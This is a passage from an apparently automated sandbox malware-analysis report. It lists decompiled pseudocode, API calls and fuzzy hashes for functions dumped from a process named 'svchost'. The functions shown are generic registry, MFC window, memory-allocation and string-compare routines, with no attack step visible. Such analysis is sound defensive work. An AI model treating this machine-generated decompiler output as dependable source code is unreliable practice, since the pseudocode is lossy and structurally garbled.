				if( *((intOrPtr*)(_t176 + 0x80)) == 2) {
					goto L10;
				} else {
					goto L28;
				}
			}





















    0x0040aff0
    0x0040aff2
    0x0040affd
    0x0040affe
    0x0040b005
    0x0040b008
    0x0040b011
    0x0040b015
    0x0040b036
    0x0040b03d
    0x0040b04a
    0x0040b05a
    0x0040b062
    0x0040b2ec
    0x0040b2f3
    0x0040b2fc
    0x0040b304
    0x0040b343
    0x0040b346
    0x0040b36f
    0x0040b374
    0x0040b377
    0x0040b37b
    0x0040b37d
    0x0040b381
    0x0040b389
    0x0040b396
    0x0040b3a0
    0x0040b3a0
    0x0040b348
    0x0040b349
    0x0040b368
    0x00000000
    0x0040b368
    0x0040b34c
    0x0040b356
    0x0040b358
    0x0040b35d
    0x0040b361
    0x0040b364
    0x0040b364
    0x00000000
    0x0040b34c
    0x0040b30d
    0x0040b310
    0x0040b334
    0x0040b312
    0x0040b312
    0x0040b313
    0x0040b328
    0x0040b315
    0x0040b316
    0x0040b31c
    0x0040b31c
    0x0040b316
    0x0040b313
    0x00000000
    0x0040b310
    0x0040b087
    0x0040b092
    0x0040b2e1
    0x0040b2e6
    0x00000000
    0x0040b2e6
    0x0040b098
    0x0040b09f
    0x0040b0b3
    0x0040b0c1
    0x00000000
    0x00000000
    0x00000000
    0x0040b0c3
    0x0040b0c3
    0x0040b0c6
    0x00000000
    0x0040b0da
    0x0040b0da
    0x0040b0da
    0x0040b0de
    0x00000000
    0x00000000
    0x0040b0e4
    0x00000000
    0x0040b0ef
    0x0040b100
    0x0040b10a
    0x0040b10e
    0x0040b180
    0x0040b185
    0x0040b18d
    0x0040b18d
    0x00000000
    0x0040b12b
    0x0040b12b
    0x0040b130
    0x0040b13b
    0x0040b155
    0x0040b157
    0x0040b15c
    0x0040b160
    0x0040b163
    0x0040b13d
    0x0040b13e
    0x0040b143
    0x0040b147
    0x0040b14a
    0x0040b14a
    0x0040b169
    0x0040b16e
    0x0040b176
    0x00000000
    0x0040b176
    0x00000000
    0x0040b1de
    0x0040b1e7
    0x0040b1ee
    0x0040b1f3
    0x0040b1fd
    0x0040b201
    0x0040b2cb
    0x0040b2cb
    0x0040b2d0
    0x0040b2d8
    0x0040b2d8
    0x0040b2dc
    0x0040b2dc
    0x00000000
    0x0040b2dc
    0x0040b207
    0x0040b20b
    0x0040b20f
    0x0040b222
    0x00000000
    0x00000000
    0x0040b228
    0x0040b22d
    0x0040b23e
    0x0040b240
    0x0040b244
    0x0040b24b
    0x0040b250
    0x0040b257
    0x0040b25c
    0x0040b266
    0x0040b26a
    0x0040b2b5
    0x0040b2b9
    0x0040b2be
    0x0040b2c6
    0x00000000
    0x0040b2c6
    0x0040b276
    0x0040b279
    0x0040b27e
    0x0040b282
    0x0040b28a
    0x0040b28f
    0x0040b291
    0x0040b295
    0x0040b299
    0x0040b29e
    0x0040b2a2
    0x0040b2a7
    0x0040b2ab
    0x00000000
    0x00000000
    0x0040b196
    0x0040b19a
    0x0040b1a1
    0x0040b1a5
    0x0040b1a6
    0x0040b1aa
    0x0040b1ab
    0x0040b1af
    0x0040b1be
    0x00000000
    0x00000000
    0x0040b1c9
    0x0040b1cf
    0x0040b1d3
    0x0040b1d7
    0x00000000
    0x00000000
    0x0040b0e4
    0x0040b0c6
    0x0040b0b3
    0x0040b0a9
    0x00000000
    0x0040b0ab
    0x00000000
    0x0040b0ab

    APIs
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?), ref: 0040B05A
    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B08E
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?), ref: 0040B125
    • RegCloseKey.ADVAPI32(?), ref: 0040B130
    • RegCloseKey.ADVAPI32(?), ref: 0040B2E6
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CloseQueryValue$Open
    • String ID: 0FI$0FI
    • API String ID: 4082589901-469067051
    • Opcode ID: d686a9f7bbc5a72ce6b93d2d3948ffaa0f29f7b1a3acd313d392d3c6e7d2d24c
    • Instruction ID: 2d293ebde8f4226ba87270bffba67c27645a439f06e906687c37b82c007b6497
    • Opcode Fuzzy Hash: d686a9f7bbc5a72ce6b93d2d3948ffaa0f29f7b1a3acd313d392d3c6e7d2d24c
    • Instruction Fuzzy Hash: 21B168B01083859FC320DF25C894F6BB7E4FBD5708F10492EF595A7291DB789809CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00484D81 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 81%
    			E00484D81(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				long _t40;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E00473304(E00490CAC, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E00484C84(_t75,  *(_t75 + 0x14));
					E004849E2(_t61, E00484C84(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E00484A43(E00484C84(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								_t40 = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14)); // executed
								 *(_t75 - 0x14) = _t40;
							} else {
								_t74 = E00484C84(_t75, _t68);
								E00484946(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14)); // executed
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E00484969(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}


















    0x00484d81
    0x00484d81
    0x00484d86
    0x00484d91
    0x00484d94
    0x00484d99
    0x00484d9e
    0x00484da4
    0x00484da8
    0x00484dac
    0x00484db4
    0x00484db7
    0x00484db8
    0x00484e6e
    0x00484e80
    0x00000000
    0x00484dbe
    0x00484dbe
    0x00484dc1
    0x00484e66
    0x00484e85
    0x00484e87
    0x00000000
    0x00000000
    0x00484dc7
    0x00484dc7
    0x00484dca
    0x00484e2c
    0x00484e34
    0x00484e42
    0x00000000
    0x00484dcc
    0x00484dd1
    0x00484e89
    0x00484e96
    0x00484e9c
    0x00484dd7
    0x00484ddd
    0x00484de8
    0x00484dfc
    0x00484e02
    0x00484e05
    0x00484e0b
    0x00484e0c
    0x00484e0d
    0x00484e0d
    0x00484dd1
    0x00484dca
    0x00484dc1
    0x00484e1a
    0x00484e23

    APIs
    • __EH_prolog.LIBCMT ref: 00484D86
    • GetPropA.USER32(?,AfxOldWndProc423), ref: 00484D9E
    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00484DFC
      • Part of subcall function 00484969: GetWindowRect.USER32(?,?), ref: 0048498E
      • Part of subcall function 00484969: GetWindow.USER32(?,00000004), ref: 004849AB
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00484E2C
    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00484E34
    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00484E3B
    • GlobalDeleteAtom.KERNEL32(00000000), ref: 00484E42
      • Part of subcall function 00484946: GetWindowRect.USER32(?,?), ref: 00484952
    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00484E96
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
    • String ID: AfxOldWndProc423
    • API String ID: 2397448395-1060338832
    • Opcode ID: f1f1f7d37241c8b45f9e38e3a63ca1d60ef60a121754bac273069352469eff1d
    • Instruction ID: d183b956f1ed9f7f600ba3538b9cb76ba457444dcbdee590b616221e594621f1
    • Opcode Fuzzy Hash: f1f1f7d37241c8b45f9e38e3a63ca1d60ef60a121754bac273069352469eff1d
    • Instruction Fuzzy Hash: 5431627280011ABBDF11AFA5DE49DBF7A7CFF85325F00452BF601A2150D7798910EBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048C8E0 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 392 48c8e0-48c8fd RtlEnterCriticalSection 393 48c90c-48c911 392->393 394 48c8ff-48c906 392->394 396 48c92e-48c937 393->396 397 48c913-48c916 393->397 394->393 395 48c9c5-48c9c8 394->395 398 48c9ca-48c9cd 395->398 399 48c9d0-48c9f1 RtlLeaveCriticalSection 395->399 401 48c939-48c94a GlobalAlloc 396->401 402 48c94c-48c968 GlobalHandle GlobalUnWire GlobalReAlloc 396->402 400 48c919-48c91c 397->400 398->399 403 48c91e-48c924 400->403 404 48c926-48c928 400->404 405 48c96e-48c97a 401->405 402->405 403->400 403->404 404->395 404->396 406 48c97c-48c992 GlobalHandle GlobalFix RtlLeaveCriticalSection call 481443 405->406 407 48c997-48c9c4 GlobalFix call 4733c0 405->407 406->407 407->395
    C-Code - Quality: 35%
    			E0048C8E0() {
				void* __ecx;
				intOrPtr _t36;
				void* _t38;
				void* _t43;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x4e1438
				_t36 = _t1;
				 *((intOrPtr*)(_t74 + 0x14)) = _t36;
				 *0x49224c(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x4
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0xe05b70
						_t38 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t38 != 0) {
							_t61 = GlobalHandle(_t38);
							GlobalUnWire(_t61);
							_t43 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t43 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t43;
						if(_t43 == 0) {
							_t15 = _t71 + 0x10; // 0xe05b70
							GlobalFix(GlobalHandle( *_t15));
							 *0x492250( *((intOrPtr*)(_t74 + 0x14)));
							_t43 = E00481443(_t65);
						}
						GlobalFix( *(_t74 + 0x10));
						_t63 = _t43;
						_t18 = _t71 + 4; // 0x20
						E004733C0(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0xe05b70
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0xe05b70
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x4
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x5
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0xe05b70
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x5
				 *(_t71 + 8) = _t34;
				 *0x492250( *(_t74 + 0x10));
				return _t70;
			}
















    0x0048c8e4
    0x0048c8e7
    0x0048c8e7
    0x0048c8eb
    0x0048c8ef
    0x0048c8f5
    0x0048c8f5
    0x0048c8f8
    0x0048c8f8
    0x0048c8fd
    0x0048c90c
    0x0048c90e
    0x0048c911
    0x0048c92e
    0x0048c92e
    0x0048c92e
    0x0048c931
    0x0048c937
    0x0048c953
    0x0048c956
    0x0048c968
    0x0048c939
    0x0048c944
    0x0048c944
    0x0048c974
    0x0048c97a
    0x0048c97c
    0x0048c986
    0x0048c98c
    0x0048c992
    0x0048c992
    0x0048c99b
    0x0048c99d
    0x0048c99f
    0x0048c9b6
    0x0048c9bb
    0x0048c9be
    0x0048c9c1
    0x0048c913
    0x0048c913
    0x0048c916
    0x0048c919
    0x0048c91e
    0x0048c91f
    0x0048c924
    0x00000000
    0x00000000
    0x00000000
    0x0048c924
    0x0048c928
    0x00000000
    0x00000000
    0x0048c928
    0x0048c8ff
    0x0048c8ff
    0x0048c906
    0x00000000
    0x00000000
    0x0048c906
    0x0048c9c5
    0x0048c9c8
    0x0048c9ca
    0x0048c9cd
    0x0048c9cd
    0x0048c9d0
    0x0048c9d3
    0x0048c9de
    0x0048c9e1
    0x0048c9e4
    0x0048c9f1

    APIs
    • RtlEnterCriticalSection.NTDLL(004E1438), ref: 0048C8EF
    • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004E141C,004E141C,0048CC7B,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42), ref: 0048C944
    • GlobalHandle.KERNEL32(00E05B70), ref: 0048C94D
    • GlobalUnWire.KERNEL32(00000000), ref: 0048C956
    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0048C968
    • GlobalHandle.KERNEL32(00E05B70), ref: 0048C97F
    • GlobalFix.KERNEL32(00000000), ref: 0048C986
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0048C98C
    • GlobalFix.KERNEL32(00000000), ref: 0048C99B
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0048C9E4
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Global$CriticalSection$AllocHandleLeave$EnterWire
    • String ID:
    • API String ID: 1877740037-0
    • Opcode ID: 6039de8a58c1313a6c764ab009bf0b701e6b4b571c609cc53bc69ed515cc8348
    • Instruction ID: 0fb558574cd719cfd31b8d3586acc4b5cc1f1e506a4120d12e69fc947eb9df05
    • Opcode Fuzzy Hash: 6039de8a58c1313a6c764ab009bf0b701e6b4b571c609cc53bc69ed515cc8348
    • Instruction Fuzzy Hash: A23172B5200705AFD724AF28DD89A2AB7E9FB44305B004D7FF996C3661E775E9048B24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047D13F Relevance: 13.7, APIs: 9, Instructions: 221COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 411 47d13f-47d170 412 47d1b2-47d1b7 411->412 413 47d172-47d185 CompareStringW 411->413 416 47d1c9-47d1cc 412->416 417 47d1b9-47d1c6 call 4785f8 412->417 414 47d187-47d18d 413->414 415 47d18f-47d1a2 CompareStringA 413->415 414->412 420 47d3a8 415->420 421 47d1a8 415->421 418 47d1de-47d1e6 416->418 419 47d1ce-47d1db call 4785f8 416->419 417->416 424 47d203-47d205 418->424 425 47d1e8-47d1fe CompareStringA 418->425 419->418 427 47d3aa-47d3bb 420->427 421->412 424->420 429 47d20b-47d20e 424->429 425->427 430 47d210-47d215 429->430 431 47d218-47d21a 429->431 430->431 432 47d225-47d228 431->432 433 47d21c-47d21f 431->433 435 47d232-47d235 432->435 436 47d22a 432->436 433->432 434 47d2bd-47d2d3 MultiByteToWideChar 433->434 434->420 437 47d2d9-47d30f call 471390 434->437 439 47d237-47d239 435->439 440 47d23e-47d240 435->440 438 47d22c-47d22d 436->438 437->420 450 47d315-47d32d MultiByteToWideChar 437->450 438->427 439->427 441 47d283-47d285 440->441 442 47d242-47d251 GetCPInfo 440->442 441->438 442->420 444 47d257-47d259 442->444 446 47d287-47d28a 444->446 447 47d25b-47d25f 444->447 446->434 451 47d28c-47d290 446->451 447->441 449 47d261-47d267 447->449 449->441 452 47d269-47d26e 449->452 450->420 453 47d32f-47d345 MultiByteToWideChar 450->453 451->439 454 47d292-47d298 451->454 452->441 455 47d270-47d277 452->455 453->420 456 47d347-47d379 call 471390 453->456 454->439 457 47d29a-47d29f 454->457 458 47d27d-47d281 455->458 459 47d279-47d27b 455->459 456->420 467 47d37b-47d390 MultiByteToWideChar 456->467 457->439 461 47d2a1-47d2a8 457->461 458->441 458->452 459->436 459->458 463 47d2b2-47d2b6 461->463 464 47d2aa-47d2ac 461->464 463->457 465 47d2b8 463->465 464->436 464->463 465->439 467->420 468 47d392-47d3a6 CompareStringW 467->468 468->427
    C-Code - Quality: 86%
    			E0047D13F(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				int _t90;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x49e2f0);
				_push(E00472CF4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x4e1ad0; // 0x1
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E004785F8(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E004785F8(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x4e1ad0; // 0x1
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x4e19e4; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00471390(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00471390(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					_t90 = CompareStringW(0, 0, 0x49de2c, _t107, 0x49de2c, _t107); // executed
					if(_t90 == 0) {
						if(CompareStringA(0, 0, 0x49de28, _t107, 0x49de28, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x4e1ad0 = 2;
							goto L5;
						}
					} else {
						 *0x4e1ad0 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}


































    0x0047d142
    0x0047d144
    0x0047d149
    0x0047d154
    0x0047d155
    0x0047d15c
    0x0047d162
    0x0047d167
    0x0047d16f
    0x0047d170
    0x0047d1b2
    0x0047d1b2
    0x0047d1b7
    0x0047d1bd
    0x0047d1c3
    0x0047d1c4
    0x0047d1c6
    0x0047d1c6
    0x0047d1cc
    0x0047d1d4
    0x0047d1da
    0x0047d1db
    0x0047d1db
    0x0047d1de
    0x0047d1e6
    0x0047d205
    0x00000000
    0x0047d20b
    0x0047d20e
    0x0047d210
    0x0047d215
    0x0047d215
    0x0047d21a
    0x0047d228
    0x0047d235
    0x0047d240
    0x0047d283
    0x0047d283
    0x00000000
    0x0047d242
    0x0047d251
    0x00000000
    0x0047d257
    0x0047d259
    0x0047d28a
    0x00000000
    0x0047d28c
    0x0047d290
    0x0047d292
    0x0047d298
    0x0047d29a
    0x0047d29a
    0x0047d29f
    0x00000000
    0x00000000
    0x0047d2a4
    0x0047d2a8
    0x0047d2b3
    0x0047d2b6
    0x00000000
    0x0047d2b8
    0x00000000
    0x0047d2b8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0047d2a8
    0x0047d29a
    0x0047d298
    0x00000000
    0x0047d290
    0x0047d25b
    0x0047d25f
    0x0047d261
    0x0047d267
    0x0047d269
    0x0047d269
    0x0047d26e
    0x00000000
    0x00000000
    0x0047d273
    0x0047d277
    0x0047d27e
    0x0047d281
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0047d277
    0x0047d269
    0x0047d267
    0x00000000
    0x00000000
    0x0047d25f
    0x0047d259
    0x0047d251
    0x0047d237
    0x0047d237
    0x0047d237
    0x0047d237
    0x0047d22a
    0x0047d22a
    0x0047d22a
    0x0047d22c
    0x0047d22c
    0x0047d22c
    0x0047d2bd
    0x0047d2bd
    0x0047d2c8
    0x0047d2ce
    0x0047d2d3
    0x00000000
    0x0047d2d9
    0x0047d2d9
    0x0047d2e3
    0x0047d2e8
    0x0047d2ed
    0x0047d2f0
    0x0047d30f
    0x00000000
    0x0047d32f
    0x0047d33e
    0x0047d340
    0x0047d345
    0x00000000
    0x0047d347
    0x0047d347
    0x0047d352
    0x0047d357
    0x0047d35a
    0x0047d35c
    0x0047d35f
    0x0047d379
    0x00000000
    0x0047d392
    0x0047d3a0
    0x0047d3a0
    0x0047d379
    0x0047d345
    0x0047d30f
    0x0047d2d3
    0x0047d21a
    0x0047d1e8
    0x0047d1f8
    0x0047d1f8
    0x0047d172
    0x0047d17d
    0x0047d185
    0x0047d1a2
    0x0047d3a8
    0x0047d3a8
    0x0047d1a8
    0x0047d1a8
    0x00000000
    0x0047d1a8
    0x0047d187
    0x0047d187
    0x00000000
    0x0047d187
    0x0047d185
    0x0047d3aa
    0x0047d3b0
    0x0047d3bb
    0x00000000

    APIs
    • CompareStringW.KERNELBASE(00000000,00000000,0049DE2C,00000001,0049DE2C,00000001,00000000,04D01BE4,0000000C,00000000,0000000C,00000000,000001D0,00000000,00000000,00470473), ref: 0047D17D
    • CompareStringA.KERNEL32(00000000,00000000,0049DE28,00000001,0049DE28,00000001), ref: 0047D19A
    • CompareStringA.KERNEL32(004564F6,00000000,00000000,00000000,00470473,00000000,00000000,04D01BE4,0000000C,00000000,0000000C,00000000,000001D0,00000000,00000000,00470473), ref: 0047D1F8
    • GetCPInfo.KERNEL32(00000000,00000000,00000000,04D01BE4,0000000C,00000000,0000000C,00000000,000001D0,00000000,00000000,00470473,00000000), ref: 0047D249
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000), ref: 0047D2C8
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 0047D329
